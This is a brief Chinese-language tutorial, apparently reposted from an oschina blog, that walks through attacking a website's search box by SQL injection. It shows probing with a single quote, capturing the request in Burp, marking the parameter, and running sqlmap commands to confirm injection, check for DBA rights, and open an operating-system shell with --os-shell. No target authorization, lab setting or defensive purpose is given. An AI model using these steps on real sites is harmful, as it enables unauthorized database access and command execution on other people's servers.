首先打开网址,找到搜索条,在搜索条里加入',发现页面出错,打开burp抓包,会看到那个参数的名字,这个时候,我们把整个消息报头粘出来,在有问题的参数那里写个*
大概就是这个样子
然后sqlmap -r 文件名.txt
发现有注入
sqlmap.py --is-dba -r 1.txt
查看是否是dba权限,发现是dba权限
sqlmap.py --os-shell -r 1.txt
输入命令whoami
来源:oschina
链接:https://my.oschina.net/u/4275902/blog/4278978